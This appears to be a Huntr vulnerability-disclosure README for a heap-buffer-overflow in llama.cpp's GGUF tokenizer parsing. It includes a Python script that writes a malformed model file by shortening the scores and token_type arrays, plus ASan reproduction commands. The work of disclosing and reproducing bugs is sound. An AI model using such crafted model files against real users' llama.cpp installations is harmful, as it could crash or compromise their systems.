---
license: other
language:
- en
tags:
- security
- gguf
- poc
- llama-cpp
- huntr
library_name: llama-cpp
---
|
|
|
|
|
# Huntr submission notes
|
|
|
|
|
This folder contains a status summary and reproduction steps for a GGUF heap-buffer-overflow in llama.cpp tokenizer metadata parsing.
|
|
|
|
|
## Files

- huntr_submission/STATUS.md
|
|
|
|
|
## PoC model file

- tmp/gguf_fuzz/llama-spm-bad-scores.gguf
|
|
|
|
|
## Base model file

- models/ggml-vocab-llama-spm.gguf
|
|
|
|
|
## PoC generation

- The PoC is created by truncating the `tokenizer.ggml.scores` and `tokenizer.ggml.token_type` arrays by one element each, so they are shorter than the token list.
- Script used:
|
|
|
|
|
```python
|
|
import struct
from pathlib import Path
|
|
|
|
|
# Input: pristine vocab-only GGUF model; output: the corrupted PoC file.
in_path = Path('models/ggml-vocab-llama-spm.gguf')
out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf')

# Byte width of each scalar GGUF value type, keyed by the GGUF type id.
# Types 8 (string) and 9 (array) are variable-length, hence None — they are
# handled by dedicated read/write paths rather than a fixed-size unpack.
GGUF_TYPE_SIZES = {
    0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8,
}
# Little-endian struct format string for each fixed-size GGUF value type.
# Type 7 (bool) is read/written as a signed byte, matching its 1-byte size.
GGUF_TYPE_FORMAT = {
    0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d',
}
|
|
|
|
|
def read_exact(f, n):
    """Read exactly *n* bytes from binary stream *f*.

    Raises EOFError if the stream yields fewer than *n* bytes, so a
    truncated GGUF file fails loudly instead of silently mis-parsing.
    """
    b = f.read(n)
    if len(b) != n:
        raise EOFError('unexpected EOF')
    return b


# Little-endian fixed-width integer readers used throughout the GGUF header.
def read_u32(f): return struct.unpack('<I', read_exact(f, 4))[0]
def read_i32(f): return struct.unpack('<i', read_exact(f, 4))[0]
def read_u64(f): return struct.unpack('<Q', read_exact(f, 8))[0]
def read_i64(f): return struct.unpack('<q', read_exact(f, 8))[0]


def read_string(f):
    """Read a GGUF string: a u64 byte-length prefix followed by raw bytes.

    Returns the payload as bytes (no decoding is attempted).
    """
    n = read_u64(f)
    return read_exact(f, n)
|
|
|
|
|
def parse_file(path):
    """Parse a GGUF file's header and key/value metadata section.

    Returns (magic, version, n_tensors, kv_list), where each kv_list entry
    is (key_bytes, value_type, array_elem_type_or_None, value).

    NOTE(review): tensor infos and tensor data after the KV section are NOT
    read (and write_file does not emit them), so round-tripping is only
    lossless for vocab-only models such as the base model used here —
    confirm n_tensors is 0 for any new input file.
    """
    with open(path, 'rb') as f:
        magic = read_exact(f, 4)
        version = read_u32(f)
        n_tensors = read_i64(f)
        n_kv = read_i64(f)
        kv_list = []
        for _ in range(n_kv):
            key = read_string(f)
            vtype = read_i32(f)
            if vtype == 9:  # array value: elem type, length, then payload
                arr_type = read_i32(f)
                arr_len = read_u64(f)
                if arr_type == 8:  # array of length-prefixed strings
                    vals = [read_string(f) for _ in range(arr_len)]
                else:
                    size = GGUF_TYPE_SIZES[arr_type]
                    data = read_exact(f, size * arr_len)
                    fmt = GGUF_TYPE_FORMAT[arr_type]
                    # fmt is e.g. '<f'; repeat the type char to unpack the
                    # whole array in one call.
                    vals = list(struct.unpack('<' + fmt[1] * arr_len, data))
                kv_list.append((key, vtype, arr_type, vals))
            elif vtype == 8:  # single string value
                val = read_string(f)
                kv_list.append((key, vtype, None, val))
            else:  # fixed-size scalar value
                size = GGUF_TYPE_SIZES[vtype]
                val = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0]
                kv_list.append((key, vtype, None, val))
    return magic, version, n_tensors, kv_list
|
|
|
|
|
def write_file(path, magic, version, n_tensors, kv_list):
    """Serialize a GGUF header + KV metadata section to *path*.

    kv_list entries have the shape produced by parse_file:
    (key_bytes, value_type, array_elem_type_or_None, value).
    The KV count written is len(kv_list); n_tensors is written as given,
    but no tensor infos or tensor data follow (vocab-only layout).
    """
    with open(path, 'wb') as f:
        f.write(magic)
        f.write(struct.pack('<I', version))
        f.write(struct.pack('<q', n_tensors))
        f.write(struct.pack('<q', len(kv_list)))
        for key, vtype, arr_type, val in kv_list:
            # Key: u64 length prefix + raw bytes, then the i32 value type.
            f.write(struct.pack('<Q', len(key)))
            f.write(key)
            f.write(struct.pack('<i', vtype))
            if vtype == 9:  # array: elem type, length, then payload
                f.write(struct.pack('<i', arr_type))
                f.write(struct.pack('<Q', len(val)))
                if arr_type == 8:  # array of length-prefixed strings
                    for s in val:
                        f.write(struct.pack('<Q', len(s)))
                        f.write(s)
                else:
                    # Pack the whole numeric array in one struct call.
                    fmt = GGUF_TYPE_FORMAT[arr_type]
                    f.write(struct.pack('<' + fmt[1] * len(val), *val))
            elif vtype == 8:  # single string value
                f.write(struct.pack('<Q', len(val)))
                f.write(val)
            else:  # fixed-size scalar value
                f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val))
|
|
|
|
|
# Load the pristine model, shorten the two per-token metadata arrays by one
# element each (so they disagree with the token list length), and write the
# corrupted PoC file.
magic, version, n_tensors, kv_list = parse_file(in_path)

new_kv = []
for key, vtype, arr_type, val in kv_list:
    if key == b'tokenizer.ggml.scores' and vtype == 9:
        val = val[:-1]  # one fewer score than there are tokens
    if key == b'tokenizer.ggml.token_type' and vtype == 9:
        val = val[:-1]  # one fewer token_type than there are tokens
    new_kv.append((key, vtype, arr_type, val))

# Make sure the output directory exists before writing the PoC.
out_path.parent.mkdir(parents=True, exist_ok=True)
write_file(out_path, magic, version, n_tensors, new_kv)
print('wrote', out_path)
|
|
```
|
|
|
|
|
## Repro (ASan)

```bash
|
|
# Configure an ASan+UBSan build (tests/examples/tools on, server off).
cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo
# Build only the tokenizer tool, using all available cores.
cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN)
# Tokenizing with the corrupted model triggers the heap-buffer-overflow.
./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello"
|
|
```
|
|
|